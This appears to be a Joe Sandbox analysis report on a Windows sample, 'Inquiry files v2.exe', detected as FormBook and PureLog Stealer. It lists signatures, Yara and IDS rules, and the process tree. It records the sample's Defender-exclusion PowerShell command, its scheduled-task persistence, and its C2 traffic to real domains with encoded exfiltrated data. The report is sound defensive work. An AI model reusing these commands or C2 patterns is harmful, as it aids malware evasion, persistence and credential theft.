Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Inquiry files v2.exe

Overview

General Information

Sample name:Inquiry files v2.exe
Analysis ID:1475661
MD5:9c2717586122db3e57ba56513f66e1b8
SHA1:8cbb9fbc61ab2ccbdbed70828fcbae389f7b2e1f
SHA256:ad233cdcf6ceab12b375ccdbf782170cb5717a76f8ecd5d7e45f84800f8ad2cc
Tags:exe
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses runas.exe to run programs with evaluated privileges
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Inquiry files v2.exe (PID: 7124 cmdline: "C:\Users\user\Desktop\Inquiry files v2.exe" MD5: 9C2717586122DB3E57BA56513F66E1B8)
    • powershell.exe (PID: 876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5196 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4196 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 1616 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • YIJBuAgnqfKMtZ.exe (PID: 5956 cmdline: "C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • runas.exe (PID: 4832 cmdline: "C:\Windows\SysWOW64\runas.exe" MD5: 13646BC81C39130487DA538B2DED5B28)
          • firefox.exe (PID: 1136 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • WOzeoJQi.exe (PID: 2404 cmdline: C:\Users\user\AppData\Roaming\WOzeoJQi.exe MD5: 9C2717586122DB3E57BA56513F66E1B8)
    • schtasks.exe (PID: 1216 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 6720 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x37c54:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x20713:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000000.00000002.2227220590.0000000007630000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2b8d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x1438f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Click to see the 15 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.2.WOzeoJQi.exe.27bdc94.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            7.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2dd73:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16832:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            9.2.WOzeoJQi.exe.27bdc94.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.Inquiry files v2.exe.7630000.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 5 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry files v2.exe", ParentImage: C:\Users\user\Desktop\Inquiry files v2.exe, ParentProcessId: 7124, ParentProcessName: Inquiry files v2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", ProcessId: 876, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry files v2.exe", ParentImage: C:\Users\user\Desktop\Inquiry files v2.exe, ParentProcessId: 7124, ParentProcessName: Inquiry files v2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", ProcessId: 876, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WOzeoJQi.exe, ParentImage: C:\Users\user\AppData\Roaming\WOzeoJQi.exe, ParentProcessId: 2404, ParentProcessName: WOzeoJQi.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp", ProcessId: 1216, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry files v2.exe", ParentImage: C:\Users\user\Desktop\Inquiry files v2.exe, ParentProcessId: 7124, ParentProcessName: Inquiry files v2.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp", ProcessId: 4196, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry files v2.exe", ParentImage: C:\Users\user\Desktop\Inquiry files v2.exe, ParentProcessId: 7124, ParentProcessName: Inquiry files v2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe", ProcessId: 876, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry files v2.exe", ParentImage: C:\Users\user\Desktop\Inquiry files v2.exe, ParentProcessId: 7124, ParentProcessName: Inquiry files v2.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp", ProcessId: 4196, ProcessName: schtasks.exe

                Snort Signatures

                Timestamp:07/18/24-07:58:39.821867
                SID:2855465
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/18/24-07:57:57.118083
                SID:2855465
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:07/18/24-07:58:26.022749
                SID:2855465
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Suricata Signatures

                Timestamp:2024-07-18T07:58:49.249317+0200
                SID:2855464
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-18T07:58:24.375289+0200
                SID:2855464
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-18T07:58:35.096685+0200
                SID:2855464
                Source Port:49733
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-18T07:58:21.770675+0200
                SID:2855464
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-18T07:58:26.978010+0200
                SID:2050745
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-18T07:58:32.533421+0200
                SID:2855464
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-18T07:58:40.282074+0200
                SID:2050745
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-18T07:58:37.683924+0200
                SID:2855464
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-18T07:57:57.804335+0200
                SID:2855465
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-18T07:58:46.875735+0200
                SID:2855464
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-18T07:58:26.978010+0200
                SID:2855465
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-18T07:58:19.096164+0200
                SID:2855464
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-18T07:58:40.282074+0200
                SID:2855465
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-18T07:57:57.804335+0200
                SID:2050745
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-18T07:58:51.685646+0200
                SID:2855464
                Source Port:49738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeReversingLabs: Detection: 65%
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeVirustotal: Detection: 47%Perma Link
                Multi AV Scanner detection for submitted file
                Source: Inquiry files v2.exeReversingLabs: Detection: 65%
                Source: Inquiry files v2.exeVirustotal: Detection: 47%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: Inquiry files v2.exeJoe Sandbox ML: detected
                Source: Inquiry files v2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Inquiry files v2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: runas.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2569895467.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, YIJBuAgnqfKMtZ.exe, 0000000F.00000003.2507786781.000000000159B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3371819645.00000000003EE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: RegSvcs.pdb, source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3378759157.0000000003EEC000.00000004.80000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3375891934.00000000052FC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3372111139.0000000003078000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000013.00000002.3028784720.0000000012D9C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000007.00000002.2570230475.0000000001280000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2569861761.0000000004973000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2579072541.0000000004B29000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.2570230475.0000000001280000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2569861761.0000000004973000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2579072541.0000000004B29000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3378759157.0000000003EEC000.00000004.80000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3375891934.00000000052FC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3372111139.0000000003078000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000013.00000002.3028784720.0000000012D9C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: runas.pdb source: RegSvcs.exe, 00000007.00000002.2569895467.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, YIJBuAgnqfKMtZ.exe, 0000000F.00000003.2507786781.000000000159B000.00000004.00000020.00020000.00000000.sdmp

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49726 -> 185.179.189.181:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49731 -> 172.96.191.69:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49735 -> 13.248.169.48:80
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 162.159.134.42 162.159.134.42
                Source: Joe Sandbox ViewIP Address: 162.159.134.42 162.159.134.42
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /midu/?hR1p0=vfrlb&zRU=9nR4RRbtczDLM92wROaICO8mWeENBuMayS9RmkCU7FdLWzi6Zh5WY9LbBJga/o2cXaf6PRrIolXtwoFpXTr9SyPSPVCys8awhBwFZAVidM2Yj+9OFlKtZImodfdv2xp/fybq7VQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enHost: www.scottifqqy.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Source: global trafficHTTP traffic detected: GET /d3vb/?zRU=ADPQ8lRoxSByg+mG86XNue8ofAjmBVNA7RwbiYYLDlrQv278ITvGwT6pBJPFcJ5Oe9Xpz76I5qFPHvmWTw5Y21ldoEnhDfgwrYz6sOCTt4XHqos0nmhmqCv1SSwJ5dTjY+t3Vmc=&hR1p0=vfrlb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enHost: www.ancuapengiu28.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Source: global trafficHTTP traffic detected: GET /cf3x/?hR1p0=vfrlb&zRU=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enHost: www.techacademy.storeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Source: global trafficDNS traffic detected: DNS query: www.scottifqqy.online
                Source: global trafficDNS traffic detected: DNS query: www.ancuapengiu28.com
                Source: global trafficDNS traffic detected: DNS query: www.techacademy.store
                Source: global trafficDNS traffic detected: DNS query: www.goodneighbor.club
                Source: unknownHTTP traffic detected: POST /d3vb/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.ancuapengiu28.comOrigin: http://www.ancuapengiu28.comReferer: http://www.ancuapengiu28.com/d3vb/Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 208User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 7a 52 55 3d 4e 42 6e 77 2f 54 5a 31 6c 51 42 50 73 66 61 33 72 70 61 4d 74 49 41 31 59 6e 33 6a 66 33 46 33 71 32 4e 36 2b 6f 59 49 4b 52 62 61 73 30 48 47 57 54 62 46 79 79 66 54 4c 63 44 48 55 4a 74 77 48 65 36 30 72 63 6d 70 6f 39 56 33 4b 75 36 36 58 54 34 6c 39 55 4a 4a 7a 6a 33 6c 54 75 30 57 6e 59 50 78 70 4d 61 4d 7a 35 37 47 68 4e 38 46 76 45 38 52 31 57 37 54 58 78 55 68 67 50 4c 55 51 38 39 53 44 6a 62 41 34 41 42 2f 70 57 77 32 47 46 43 36 52 59 2f 72 74 32 55 7a 7a 6c 4d 44 33 31 35 43 56 42 58 55 6a 35 39 50 73 45 6c 57 77 2f 55 39 6f 59 6f 53 4e 39 53 39 58 4d 56 43 66 6b 4c 6a 55 39 75 50 5a 71 77 66 Data Ascii: zRU=NBnw/TZ1lQBPsfa3rpaMtIA1Yn3jf3F3q2N6+oYIKRbas0HGWTbFyyfTLcDHUJtwHe60rcmpo9V3Ku66XT4l9UJJzj3lTu0WnYPxpMaMz57GhN8FvE8R1W7TXxUhgPLUQ89SDjbA4AB/pWw2GFC6RY/rt2UzzlMD315CVBXUj59PsElWw/U9oYoSN9S9XMVCfkLjU9uPZqwf
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 18 Jul 2024 05:58:18 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 